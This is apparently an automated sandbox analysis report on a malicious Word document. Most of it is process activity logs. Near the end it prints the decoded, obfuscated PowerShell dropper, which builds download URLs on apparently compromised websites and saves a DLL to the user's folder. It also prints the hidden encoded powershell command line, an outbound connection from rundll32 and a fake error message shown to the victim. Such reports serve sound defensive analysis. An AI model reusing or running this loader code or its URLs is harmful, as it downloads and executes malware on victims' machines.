Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2400

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_002B109C FindFirstFileW,

15_2_002B109C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 00000005.00000002.2102201796.0000000000404000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,

7_2_100011C0

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_1000C620

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_1000C620

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_1000C620

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024C4FF mov eax, dword ptr fs:[00000030h]	7_2_0024C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0021C4FF mov eax, dword ptr fs:[00000030h]	8_2_0021C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0047C4FF mov eax, dword ptr fs:[00000030h]	9_2_0047C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0023C4FF mov eax, dword ptr fs:[00000030h]	10_2_0023C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0027C4FF mov eax, dword ptr fs:[00000030h]	11_2_0027C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022C4FF mov eax, dword ptr fs:[00000030h]	12_2_0022C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0021C4FF mov eax, dword ptr fs:[00000030h]	13_2_0021C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_006FC4FF mov eax, dword ptr fs:[00000030h]	14_2_006FC4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_002BC4FF mov eax, dword ptr fs:[00000030h]	15_2_002BC4FF

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,

7_2_10001B30

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_10007F07

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 5.2.136.90 80

Jump to behavior

Encrypted powershell cmdline option found

Show sources

Source: unknown	Process created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAK